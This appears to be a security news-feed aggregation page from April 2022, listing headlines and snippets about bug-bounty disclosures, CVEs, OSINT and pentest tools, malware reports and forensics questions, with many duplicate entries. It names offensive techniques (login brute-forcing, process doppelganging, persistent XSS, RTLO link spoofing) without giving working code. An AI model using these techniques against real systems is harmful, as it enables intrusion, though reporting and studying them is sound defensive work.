    Today I’m going to break down the main sources of data I use when doing OSINT user profile research on Discord: Continue reading on Medium »
  • Open

    [https://shipit-sox-staging.shopifycloud.com] Presence of multiple vulnerabilities present in Ruby On Rails
    Shopify disclosed a bug submitted by beastglatisant: https://hackerone.com/reports/1400309 - Bounty: $500
    Account takeover leading to PII chained with stored XSS
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1483201
  • Open

    Any ideas what college students would love to see from a guest speaker?
    I work in DFIR, and I’ve been invited to talk to college students about my experience, the field, etc. any good ideas of what I should include and make sure to talk about? submitted by /u/tfulab23 [link] [comments]
  • Open

    SecWiki News 2022-04-16 Review
    半天打穿某高校 by ourren 基于图查询的攻击溯源方法 by ourren Banli板栗-高危资产识别和高危漏洞扫描 by ourren SCA的困境和出路 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-16 Review
    半天打穿某高校 by ourren 基于图查询的攻击溯源方法 by ourren Banli板栗-高危资产识别和高危漏洞扫描 by ourren SCA的困境和出路 by ourren 更多最新文章,请访问SecWiki
  • Open

    Pandora Swap is launching a Bug Bounty Program
    Hi, Pandora Legion! We are very impressed and mesmerized by your love, support, and interactions. and we have a new announcement to make Continue reading on Medium »
    How I Hacked My School’s Students Portal to get access to any student’s details?
    Introduction Continue reading on Medium »
    HOW RECON HELPED ME TO GET A STORED XSS!
    RECONNAISSANCE IS THE KEY IN BUG BOUNTIES Continue reading on Medium »
    Linux User Controls
    What is Linux Continue reading on Medium »
    Port scanning and service discovery in 2022 — we have failed as a humanity
    There have been a lot of popular port scanning projects lately. In particular, these are projects that seek to combine fast port discovery… Continue reading on Medium »
    How we spoofed ENS domains for $15k
    TL;DR: We found a flaw that allowed us to spoof Ethereum domain names and received a $15k bounty. Continue reading on Medium »
    Change Any User Profile Details on Disney
    The Walt Disney Company started its program on Hackerone in March 2022. Continue reading on Medium »
    Creating Your Own Telegram Bot For Recon Bug Bounty
    Hello Friends this is my fourth blog regarding bug hunting Continue reading on Medium »
  • Open

    Kiterunner
    🔍 Introduction Kiterunner는 Assetnote에서 만든 Content-Discovery 도구로 지정한 위치에 Fuzz/BruteForce 방식의 일반적인 도구가 아닌, 알려진 Swagger Spec 데이터와 자체 스키마로 압축된 데이터 세트를 사용하여 API 스펙을 추측합니다. 그리고 알려진 HTTP Method, Header, Path, Param 등을 전송하며 API Endpoint를 찾는 도구입니다. 참고로 Assetnote는 주기적으로 변하는 Wordlists를 가지고 운영하기 때문에 Kiterunner가 사용하는 Wordlist 자체가 이미 단순한 리스트가 아닌, 실제로 웹에서 많이 사용되는 데이터를 기반으로한 리스트입니다. 당연히 더 빠르고 좋은 결과를 만들 수 있겠죠.
  • Open

    Industroyer2: The Worst Sequel
    submitted by /u/entropydaemon5 [link] [comments]
    GitHub: Security alert - Attack campaign involving stolen OAuth user tokens issued to two third-party integrators (Heroku and Travis CI)
    submitted by /u/DAMNIT_RENZO [link] [comments]
  • Open

    PhpMyAdmin文件包含漏洞白盒解析(从理论到实战)
    通过对主流mysql连接框架的白盒解析,配合实战的记录,方便读者能更快学以致用
    虚拟靶场抓到巨帧包!
    在自己的虚拟化靶场中抓包,发现 wireshark 面板中的 Length 远大于 MTU,而明明在抓包网卡的MTU是1500,这是为什么呢?
    HackTheBox之Overflow靶机
    前言这是一台困难靶机,靶机内容主要考察了web漏洞利用,逆向,权限维持,提权等各个方面的内容。
  • Open

    JekyllBot:5 A Security Vulnerability Affecting Hospital Robots [pdf]
    Article URL: https://assets.website-files.com/5d2ad783e06f4c19469d363a/625551dd440d0b187fa96d38_JekyllBot-5-Vulnerability-Disclosure-Report.pdf Comments URL: https://news.ycombinator.com/item?id=31048534 Points: 1 # Comments: 0
  • Open

    Resource Based Constrained Delegation
    A quick read on an attack path that can be leveraged to escalate network privileges and for lateral movement. Continue reading on Medium »

  • Open

    PYSA Ransomware Group Technical Analysis
    submitted by /u/wtfse [link] [comments]
    [Techmonitor.ai] Failed cyberattack on Ukraine's electricity grid could indicate Russia's growing willingness to attack critical infrastructure
    submitted by /u/NoStarchPress [link] [comments]
    New tool to exploit TURN servers - create a socks proxy into the internal network
    submitted by /u/FireFart [link] [comments]
    Multiple Vulnerabilities in Cisco Expressway
    submitted by /u/FireFart [link] [comments]
    Turncoat - Extract private messages from malware/phishing Telegram Bots
    submitted by /u/DoOrDieCalm [link] [comments]
    iViewed your API keys
    submitted by /u/Gallus [link] [comments]
  • Open

    Stored XSS, SQL, IDOR and Hall Of Fames
    Hello, today I am going to be writing about how I found stored XSS, reflected XSS, SQL and IDOR all within a software that was in scope… Continue reading on Medium »
    Mining Liquidity for Bug Bounty Contribution
    Hats Finance is excited to introduce Protocol Protection Mining starting in Q2 2022, allowing anyone in the ecosystem to become a… Continue reading on Medium »
  • Open

    A Detailed Guide on Medusa
    Hi Pentesters! Let’s learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.
    A Detailed Guide on Medusa
    Hi Pentesters! Let’s learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.
  • Open

    Autopsy web cache understanding
    Hello everyone, I am a junior analyst and today I was doing a forensic on a disk from one PC with Autopsy. I had some alerts of a user accessing some malicious website and running some sort of DoS attack. I checked browser history and could not find any log of opening that website (he could be removed it or opened in a private window), but when I was doing forensic in Autopsy, in Web Cache I could find multiple web caches like this for example: URL: https://okay-website.com https://malicious-website.com URL: https://okay-website.com https://malicious-website.com https://malicious-website.com/target/blablabla For some of these, the domain was also pointing to the https://malicious-website.com Now my question is, as I could not able even in Autopsy web history find that website, nor did I find some downloads or anything else, was it possible that the user did not open a malicious website, but that okay-website.com did in the background? I am not sure if I understood 100% what is the meaning of those web caches. Now a few things to know: 1) Alerts that I got were at the exact same time as the user opened okay-website for the first time 2) In Web Cache I could see similar results for other domains that are linked to the advertisement 3) With uBlock Origin I can see those ad URLs that he blocked, the very same as in autopsy, but I can not see the malicious site. ​ Cheers and thanks submitted by /u/facyber [link] [comments]
    How Mobile Forensic tools work ??
    Hi community… Commercial available tools like Cellebrite UFED in Mobile Forensics obtain deleted data by rooting the device … But how’s it possible without installing the Magisk and unlocking the bootloader .. Even after the process the device doesn’t show any trace for root .. Any idea on the details of the tools .. Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Malware Lab / Analysis - Internet Connectivity - Analyzing Secondary Payloads?
    I have a question around malware labs and handling external communications. I've been building out a Malware analysis lab in VMWare with a REMnux VM and a Win10 machine. Obviously the machines should be isolated on their own internal network isolated from my primary workstation. So my question with this setup is, how do we analyze secondary payloads that may require a download from the internet if the VM's don't have a way of getting out? We can capture that the initial payload is attempting to reach out to a domain or IP to pull something down, but it won't be successful. Just curious if there's a safe way to workaround this, or if we don't really concern ourselves with actually grabbing the secondary payload from the web that it's trying to get? submitted by /u/IHadADreamIWasAMeme [link] [comments]
    Which Linux distribution would you recommended for only using as quarantina?
    I want to create a virtual machine that I will use it to download files that I think malicious. A distribution without unnecessary applications would be great to be honest but I could need some basic tools while opening the files. And I need a GUI too. Which distribution would you recommended to me? submitted by /u/Cpt_Winters [link] [comments]
    Building a vulnerability management dashboard
    So I am not a developer but I was asked to develop a dashboard for vulnerability management. I think of nessus instantly. Is there an open source dashboard I can work with? I am very new at this. I will remove this post if its a wrong sub reddit to ask in. submitted by /u/light_striker12 [link] [comments]
    Career Shift
    Anyone here who are former netsec engineers that are now in the field of DevOps? How was the transition? Did you start again from scratch? submitted by /u/heisenboard [link] [comments]
    Anyone ever work for the NSA?
    I've been considering it for the future, because I'm going to school for cybersecurity right now and I have no clue if I want to work for the government, or do something else. What would you recommend? And what is working there like? Seriously thank you so so much if you answer this question because I have been looking everywhere and I haven't been able to find anyone who has worked/works there. :D submitted by /u/AQuestionableAgender [link] [comments]
  • Open

    War in Ukraine / April 14
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Exploring the Dark Web…
    Today I’m going to talk to you about tools for exploring the Dark Web. The list will be updated, as the topic is very diverse. Continue reading on Medium »
    IP address OSINT
    Today I want to discuss with you a number of sources that I use when conducting IP address OSINT research. Continue reading on Medium »
  • Open

    SecWiki News 2022-04-15 Review
    APTMalInsight:基于系统调用信息和本体知识框架识别和认知APT恶意软件 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-15 Review
    APTMalInsight:基于系统调用信息和本体知识框架识别和认知APT恶意软件 by ourren 更多最新文章,请访问SecWiki
  • Open

    Corrupting the Source Docker Image
    submitted by /u/tbhaxor [link] [comments]
    Demystifying iOS Code Signature
    submitted by /u/dmchell [link] [comments]
  • Open

    SSE(Server Sent Event)
    🔍 Introduction SSE(Server-Sent Event)는 Server Push 기술로 웹 소캣과 유사하게 서버와 Javascript가 서로 통신하여 데이터를 받아올 수 있습니다. 다만 웹소켓의 경우 양방향 통신이 가능하지만, SSE는 서버→클라이언트로 받는 요청만 처리할 수 있습니다. 단순히 서버로부터 Push를 받아야하는 경우 SSE가 가장 간편한 기술로 사용될 수 있습니다. 다만 성능이나 기술적인 부분에서 이점보단 단점이 많아서 대부분의 서비스에선 WebSocket 또는 Ajax 방식을 많이 사용합니다. Event Straem Format Basic and content-type SSE는 text/event-stream 타입과 plain text response를 사용합니다.
  • Open

    Gaining Visibility Within Container Clusters
    Service mesh platforms can be used to provide insight into the container processes and their network operations within K8s clusters. The post Gaining Visibility Within Container Clusters appeared first on Unit42.
  • Open

    数字中国车联网赛题设计思路
    本文由 伽玛实验室-mldwyy小姐姐提供,赛后将该题设计思路及解法公开供大家学习交流。
    数字中国车联网赛题设计思路
    本文由 伽玛实验室-mldwyy小姐姐提供,赛后将该题设计思路及解法公开供大家学习交流。
    FreeBuf早报 | 微软破坏了ZLoader僵尸网络;超350万俄罗斯互联网账户被攻破
    俄罗斯黑客试图用 Industroyer2 恶意软件攻击乌克兰的电网。
    思科修复高危身份验证绕过漏洞
    思科无线局域网控制器软件中存在高危漏洞,攻击者能够利用该漏洞绕过身份验证控制。
    ATT&CK v10版本战术介绍—资源开发
    本期我们为大家介绍ATT&amp;CK 14项战术中资源开发战术。
    从电信网络诈骗角度剖析,诈骗资金是如何流转的?
    近年来,随着我国经济社会向数字化快速转型,犯罪结构发生了根本性变化。
    新型Enemybot DDoS僵尸网络借用Mirai和Gafgyt攻击代码
    近日,有研究显示,一个从事加密挖矿攻击和分布式拒绝服务(DDoS)攻击的威胁组织或与一个名为Enemybot的新型僵尸网络或有关。
    CISA警告机构修补积极利用的Windows LPE错误
    网络安全和基础设施安全局(CISA)在其积极利用的漏洞列表中添加了10个新的安全漏洞。
    FreeBuf甲方群话题讨论 | 聊聊企业资产安全管理
    面对现今资产高度数字化、威胁隐患越来越多的网络环境,越发庞大的资产,安全性也显得越发脆弱,维护好企业资产安全面临着较大挑战。
    DVRF靶场复现
    近年来随着各种IOT设备漏洞越来越被大众所关注,漏洞利用所带来的危害也日趋严重。
    谷歌浏览器紧急更新,又修复一零日漏洞
    谷歌发布更新版本Chrome 100.0.4896.127,以解决一个在野被利用高严重性零日漏洞。
    Apache Dubbo CVE-2021-36162 挖掘过程
    Apache Dubbo CVE-2021-36162 挖掘、分析过程。
    想不到,美国核设施太老竟成保命关键?
    直到三年前,美国核系统还在使用一台 1976年生产的 IBM System 1 计算机,有策略认为,因为这些系统太旧了,反而不容易被破解。
    2022年第一季度美国数据泄露持续上升,“未知”成最大攻击媒介
    ITRC记录的绝大多数 (92%) 数据泄露事件可追溯到网络攻击,其中网络钓鱼和勒索软件是总体上排名前两位的原因。
    常见框架漏洞复现—Apache Struts2
    Struts 2漏洞复现分析
    Spring Cloud Gateway 远程代码执行漏洞分析(CVE-2022-22947)
    Spring Cloud Gateway 远程代码执行漏洞分析(CVE-2022-22947分享)

  • Open

    Encontrei meu Primeiro Cross-site Scripting (XSS)
    Olá Hunters! Nesse pequeno Artigo Vou explicar como encontrei meu primeiro (XSS) Continue reading on Medium »
    Bypass Rate Limit — A blank space leads to this random encounter!
    Hello All, Hope you are having a great time! Continue reading on InfoSec Write-ups »
    MY First Bug In Hackerone
    Hello My Dear Buggies!!! Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »
  • Open

    Next step for exploit dev ?
    Good day everyone, So I’ve done a lot of the sources for beginners/intermediate for reversing and exploit dev. I’ve gone through sources users like u/PM_ME_YOUR_SHELLCODE have recommended, also did pwncollege which was really amazing. But now I wanna get into real world stuff and learn as I go. I wanna focus maybe on browser stuff but it’s really overwhelming and hard to find helpful resources. I’m asking to see if anyone here with experience has any pointers on what to start on and where to look( doesn’t necessarily have to be browsers, if anyone has interesting fields to get into I’d be happy to try new things). submitted by /u/Any-Presentation-679 [link] [comments]
    Will learning 6502 processor help me later in binary exploitation and reverse engineering?
    Hello, So basically i am management of information technology graduate. I took basic os and hardware courses in college. Currently i am doing an it internship,and i am practising my hacking skills on hackthebox(web and networks only) . I am very passionate about reverse engineering,assembly,and binary exploitation. I plan that after i am comfortable enough with web applications hacking i can then start doing some exploit development. I am good with solving basic crackmes and simple buffer overflows but that is it. I have a gap in hardware area ,then I discovered someone called Ben Eater on youtube, and I ordered his kit to build a 6502 computer. I am doing this as a hobby first and foremost to know how computers work and interact with cpu and memory. But also so that later in my career i can comfortably understand stack,assembly,and kernel exploits on a deeper level. So is that good or i just wasted my money on the kit? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Diving Deeper into WatchGuard Pre-Auth RCE - CVE-2022-26318
    submitted by /u/Mempodipper [link] [comments]
    Blinding Snort: Breaking the Modbus OT Preprocessor
    submitted by /u/derp6996 [link] [comments]
    CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg
    submitted by /u/docker-osx [link] [comments]
    VSTO enabled Office documents allow for remote .NET assembly remote code execution
    submitted by /u/DanielS-AL [link] [comments]
    Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
    submitted by /u/gquere [link] [comments]
    Extracting the hashed uninstall password for Cortex XDR being low privileged user
    submitted by /u/gid0rah [link] [comments]
    Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers. The Chinese-backed Hafnium hacking group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Read and write beyond bounds in mod_sed
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1511619 - Bounty: $4000
    [Bypass] Ability to invite a new member in sandbox Organization
    HackerOne disclosed a bug submitted by 0619: https://hackerone.com/reports/1486417 - Bounty: $2500
  • Open

    THE WORLD’S MOST COMPREHENSIVE OSINT TOOL CATALOG MORE THAN 600 TOOLS 2022.
    Waiting for the most expected OSINT service, analyzing more than 600 resources at a time, to be launched (more info here…).  We’re sharing… Continue reading on Medium »
    War in Ukraine / April 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools(OSINT) every security engineer should be aware off
    We will try to solve three questions in this blog. Let’s explore !! Continue reading on Medium »
    Searchlight — IMINT
    This room has OSINT challenges. In this room, we will be exploring the discipline of IMINT/GEOINT, which is short for Image intelligence… Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »
    Google Dorks or Hack…
    Google Dorks or Hack is a technique for creating queries on the Google search engine to discover hidden information and vulnerabilities… Continue reading on Medium »
    Searching and Aggregating TOR/ONION Links
    While crawling and processing tons of pastes from public paste sites like Pastebin I recognized that people also use these sites to… Continue reading on Medium »
  • Open

    Process Doppelganging (Mitre:T1055.013)
    Introduction Eugene Kogan and Tal Liberman presented a technique for defense evasion called “Process Doppelganging” in Blackhat EU 2017 which can be found here and The post Process Doppelganging (Mitre:T1055.013) appeared first on Hacking Articles.
    Process Doppelganging (Mitre:T1055.013)
    Introduction Eugene Kogan and Tal Liberman presented a technique for defense evasion called “Process Doppelganging” in Blackhat EU 2017 which can be found here and The post Process Doppelganging (Mitre:T1055.013) appeared first on Hacking Articles.
  • Open

    Listen to the rumble of dream cars (with videos)
    http://162.212.178.138:8080/cars test http://162.212.178.138:8080/don-games/ Android games http://162.212.178.138:8080/d3/Top10 of something http://162.212.178.138:8080/d4/Videos about China http://162.212.178.138:8080/china/ music videos from China http://162.212.178.138:8080/gsongs/ mp4 pop-rock music submitted by /u/Appropriate-You-6065 [link] [comments]
    Massive SWF archive
    https://locker.phinugamma.org/swf/ It has many SWF files from numerous sites like Armor Games, Addicting Games, Albino Black Sheep, The Best 404 Page Ever, Miniclip, and more. submitted by /u/JeffedCenaa2 [link] [comments]
  • Open

    Dependabot alerts now surface if your code is calling a vulnerability
    Article URL: https://github.blog/2022-04-14-dependabot-alerts-now-surface-if-code-is-calling-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31029253 Points: 2 # Comments: 0
    CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers
    Article URL: https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=31029245 Points: 1 # Comments: 0
    Preventing Cryptographic Failures: The No. 2 Vulnerability in the OWASP Top
    Article URL: https://www.synack.com/blog/preventing-cryptographic-failures-the-no-2-vulnerability-in-the-owasp-top-10/ Comments URL: https://news.ycombinator.com/item?id=31027891 Points: 1 # Comments: 0
  • Open

    CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers
    Article URL: https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=31029245 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-14 Review
    ATT&CK 变成安全“元宇宙”? by ourren TP-Link-WDR-7660 安全研究之固件分析 by ourren 知识图谱可视化技术的实践与探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-14 Review
    ATT&CK 变成安全“元宇宙”? by ourren TP-Link-WDR-7660 安全研究之固件分析 by ourren 知识图谱可视化技术的实践与探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf周报 | 恶意软件Mirai正积极利用Springl漏洞;消费者对数据泄露日益麻木
    调查显示。消费者对与他们开展业务的组织的信任处于最低点,导致许多人“放弃”安全性。
    因数据或隐私安全问题,这家巨头近一年已累计被罚超10亿美元
    对互联网企业而言,数据信息既是心头肉,又是心头痛,在利益与维系用户隐私安全面前走钢索,翻车在所难免。
    vulnhub靶机-DerpNStink-1
    7-vulnhub靶机-DerpNStink1
    使用Elasticsearch SIEM搭建小型组织SIEM平台
    Elasticsearch SIEM提供了中小型企业一种自建SIEM的解决方案。优点是开源、组件齐全、文档详细、易扩展等等。
    Shellcode免杀之Go免杀
    Go语言专门针对多处理器系统应用程序的编程进行了优化,使用Go编译的程序可以媲美C或C++代码的速度,而且更加安全、支持并行进程。
    FreeBuf早报 | 非洲银行成恶意软件攻击主要目标;风力涡轮机巨头Nordex遭网络攻击
    德国风力涡轮机制造商 Nordex Group于2022年3月31日遭到网络攻击,该公司本周发布了更新。
    HackTheBox WeatherApp WP 一道 SSRF + SQL 注入的典型案例,代码审计
    这道题目难度中等,如果不提供源码的话是非常难以解决的,虽然可以想到 SSRF,但有点盲人摸象的感觉。
    PortSwigger 基于 WebSocket 的漏洞讲解
    PortSwigger-基于WebSocket的漏洞学习笔记。
    VMware CVE-2022-22954漏洞强势来袭 请立刻打补丁!
    近日,研究人员发现了针对远程代码执行(RCE)漏洞 VMware CVE-2022-22954的概念验证漏洞。
    Elementor WordPress 插件存在漏洞,可能影响 50 万个站点
    WordPress Elementor页面构建插件存在远程代码执行漏洞,可能影响多达 50 万个网站。
    Apache Struts中的CVE-2021-31805 RCE漏洞终于得到修复
    Apache软件基金会敦促机构设法解决编号为CVE-2021-31805的漏洞。
    工信部印发《工业互联网专项工作组2022年工作计划》
    《计划》要求,打造“5G+工业互联网”升级版:加快5G全连接工厂建设,出台5G全连接工厂建设指导性文件,打造10个5G全连接工厂标杆。
    关于Spring framework RCE(CVE-2022-22965)的一些问题思考
    在Spring RCE漏洞在野曝光了一段时间后,Spring官方终于在3月31日发布了漏洞信息,本文分享和解答一些有关这个漏洞的疑问。
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    BotNet probing private IP ranges?
    Good morning, Have a question for you all that I can't think through the answer. We exist in Azure GCC-H. Looking at my Sentinel threat dashboard, I see a list of "high confidence" botnet activity originating out of Russia, attempting to hit all of my VMs in Azure. Now, they are all private IP addresses, so what I am wondering is how is an external system not in my domain attempting to connect to a 10.X IP address inside my domain without being on a VPN? Is it just pointing its scan at my public gateway and going through the whole list of private IPs, hoping to be able to break through to one? submitted by /u/ToLayer7AndBeyond [link] [comments]
    VPN Host Checker - Asset Validation
    Morning. We’re currently setting up a new VPN environment and we’re thinking about asset validation. There are two options, checking for a machine PKI certificate or simply checking domain membership. Is it enough to simply check domain membership, and can’t that be faked in some way? submitted by /u/annonuk2020 [link] [comments]
    Question about network hardware devices (router,modems,and nic)
    I have a TP-Link router, Old ethernet nic card,and a modem that i want to understand more . Hello; I want to learn some hardware . I am fully aware of the osi model and studied network+ before and understand how nic and routers are used. But can someone explain the components to me on a very low level? Attatched are the hardware i have ,if anyone can point me to a datasheet or something that explains each part(this is a capacitor,this is for volt resistance). Some parts i can identify but others are not. If anyone can help that would be great cuz i want to understand them more . Here is the nic : https://www.amazon.com/Realtek-RTL8139D-100Mbps-Ethernet-Adapter/dp/B000YJIJI2 The modem : https://archiwum.allegro.pl/oferta/modem-lucent-hv90p-t-warszawa-i7535730930.html I kept searching for anything that tells me each component on them but I can’t find any. Thanks submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Persisting XSS With IFrame Traps
    XSS Iframe Traps Longer Running XSS Payloads An issue with cross-site scripting (XSS) attacks is that our injected JavaScript might not run for an extended period of time. It may be a reflected XSS vulnerability where we’ve tricked our user into clicking a link, but when they land on the page where we were able... The post Persisting XSS With IFrame Traps appeared first on TrustedSec.
  • Open

    Make phishing great again. VSTO office files are the new macro nightmare?
    Intro to the Office VSTO format, a capability that provides rich capabilities for attackers to phish users and gain code execution Continue reading on Medium »
  • Open

    The Art of Memory Forensics
    I read somewhere that memory structures change with every iteration of Windows. With that said, does anyone know if The Art of Memory Forensics (2014) is still relevant? Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    Is it possible to split pcap files into pieces?
    I have a big pcap file. I want to split it into chunks with data of the same size each (ex. 1000 packets each). submitted by /u/One-Ad2289 [link] [comments]
    iOS Backup Analysis with Open Source
    Hi community .. currently working on a project on analysing the iPhone backup data with open source tools … I’m working on iOS version 15.3 … I have taken unencrypted backup of passcode disabled … How can we analyse these type of files written in format ‘b5, 56, 20’ etc.. Any suggestions would be helpful… Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Critical RCE Vulnerability in Elementor WordPress Plugin
    Security Risk: High Exploitation Level: Easy CVSS Score: 9.9 Vulnerability: Remote code execution (RCE) Patched Version: 3.6.3 On April 12th, an important security update was released for the Elementor plugin patching a critical remote code vulnerability which allows all authenticated users, including subscribers, to upload and execute arbitrary PHP code on a vulnerable website. This vulnerability, identified as CVE-2022-1329, is extremely severe. Continue reading Critical RCE Vulnerability in Elementor WordPress Plugin at Sucuri Blog.
    Sucuri WordPress Plugin += Sucuri WAF
    Sucuri has always been a dedicated supporter of the WordPress community. Our free plugin was one of our first contributions to WordPress security (before bootstrapping our efforts into our WAF/CDN, Backups, and Malware Remediation services). However, over my many years involved in web application security, I’ve found that one of the most evasive aspects of security for most business owners, enterprises, and agencies is visibility into security events impacting their websites. This includes monitoring who is logging in, knowing what changes are occuring in your site’s environment, and understanding what steps you can take to mitigate risk or react to a compromise.  Continue reading Sucuri WordPress Plugin += Sucuri WAF at Sucuri Blog.
  • Open

    Digging Into Open Reporting
    As many readers of this blog are aware, I often find great value in open reporting, but that I also see the value in taking that open reporting a step (or three) further beyond where it exists now. In more than a few instances, something extra can be pulled from open reporting, something not presented or discussed in the article that can be of significant value to readers in domains such as DFIR, detection engineering, MSS/SOC monitoring, etc. As a result, I've spent a great deal of time during my career looking for alternate means for detecting activity (user, threat actor, malware) presented in open reporting, largely due to gaps in that reporting. For example, there's a great deal of open reporting that is based solely on RE and analysis of malware that is part of the final stage of the…

  • Open

    Reflected XSS on TikTok Website
    TikTok disclosed a bug submitted by homosec: https://hackerone.com/reports/1378413 - Bounty: $3000
    CSRF protection bypass in GitHub Enterprise management console
    GitHub disclosed a bug submitted by bitquark: https://hackerone.com/reports/1497169 - Bounty: $10000
    Stored XSS on the "www.intensedebate.com/extras-widgets" url at "Recent comments by" module with malicious blog url
    Automattic disclosed a bug submitted by superpan: https://hackerone.com/reports/1083734 - Bounty: $150
    Improper Implementation of SDK Allows Universal XSS in Webview Leading to Account Takeover
    EXNESS disclosed a bug submitted by holyfield: https://hackerone.com/reports/1455987 - Bounty: $300
    Ability to connect an external login service for unverified emails/accounts at accounts.shopify.com
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1018489 - Bounty: $1600
    CRLF Injection - Http Response Splitting
    EXNESS disclosed a bug submitted by socialcodia: https://hackerone.com/reports/1514359 - Bounty: $200
    Acess control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174387 - Bounty: $1000
    Access control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174734 - Bounty: $2500
    Access control vulnerability (read-only)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1159367 - Bounty: $2250
    Taking position in a discontinued forex pair without executing any trades
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1509211 - Bounty: $2337
    Open S3 Bucket Accessible by any User
    Omise disclosed a bug submitted by ravansurya: https://hackerone.com/reports/1474017 - Bounty: $100
  • Open

    Other than these, how to best mitigate a DDoS attack?
    Other than CloudFlare, blocking IP blocks on the network firewall and blocking on server's IPtables, what else can be effectively done to mitigate a DDoS attack? submitted by /u/arpegius55555 [link] [comments]
    is my Android screen being monitored?
    Okay here's the thing, I've recently observed that when ever I open my Instagram's vanish mode i see that line " you took screenshot" and it's multiple and comes off like a blast. Where as i haven't taken any screenshots My gallery is clear And I've observed that my device is running slow after the recent softener update it's an realme xt, running Android security patch of date March 5 2022, I usually limit background apps in dev options. I'm not a netsec student or a professional. But someone who is concerned about his privacy. I don't think anyone has any grudges on me. Is it a bug or is it an spyware that i may have accidentally downloaded? Do help me. I may not respond to the comments for the next 6 hrs since I'm crashing to sleep after a whole day of studying. Ik this might be a low effort question. But do apologise. I'm trying my best I've seen my permissions including admin permissions on my phone and all seem normal. submitted by /u/0_lucifer_0 [link] [comments]
    how to know if I'd prefer offensive or defensive security?
    Hello. I am a support engineer, working on my sec+ and hoping to get a cyber security job within a year or two. I can't make up my mind about whether id rather be blue team or red team. CTFs are very fun. Getting a flag or a reverse shell is a rush. But I'm not sure about actual pentesting. Trying to break into a black box system for 100 hours does not sound fun. Blue team sounds fun too. The hunt, trying to figure out how an incident happened and who did it. I also imagine it would be easier to work for startups or big companies later in my career (FAANG). I also like programming beyond scripting. Thoughts? submitted by /u/Throwaway_deafgrape [link] [comments]
    How to find interesting computers on a big network?
    Hello community! When auditing a large Windows network (like 300 computers) how do you figure out which computers may be of interest ? It may be easy if computers are name meaningfully (ADM-something) but if it is not the case how can I figure out (for example) the computer used by a given user (admin, CEO, etc) ? Is it possible to get that information with a powershell AD query? Regards submitted by /u/fAyf5eQR [link] [comments]
    Trusted Remote Desktop Services (RDP) SSL Certificate
    Hi everyone. ​ Our Cyber Security department told us to start deploying and using Certificates to secure comunication between RDP and WMI client and server. My question is related to the valid and renewal period. What should be configured and why? ​ Thanks!! submitted by /u/plainas [link] [comments]
    Securing a password manager with 2FA makes no sense?
    Password managers like LastPass, Bitwarden, 1password, e.g. encourage the use of 2FA to add additional protection by using an authenticator/Yubikey. I strongly disagree, and I don't know why anyone would use 2FA to access their password managers. I travel around the world very much and frequently, also to very hostile countries in Africa and have experienced muggings and armed robberies myself. It's not too uncommon to have all your belongings taken.I would recommend 2FA for individual websites, but for a password manager that contains ALL your passwords, including the ones to back up your 2FA is just nuts. Example: Imagine you are in Ukraine right now.All your passwords are stored in LastPass and you can only access it through your master password and Google Authenticator. The Russians come and take away everything. You have no phone, no computer, nothing. You manage to escape to Poland. You get hold of new devices and try to login LastPass. You can't, because you are missing the 2FA device. Ok, next step. Maybe use the backup codes. Dang, they are stored in LastPass aswell. Ok, next try. Maybe ask Google for help to recover your account. They gave you instructions and tell you to login your Google account or ask to verify your email --> Nope, not possible, because those login details are saved there aswell. You see where this is going? Losing your 2FA device is one of the worst things that could happen. It's and endless loop of not being able to login/reset your devices. Now, even if I have a second phone with the 2FA codes stored in a secure location, that would also be useless if 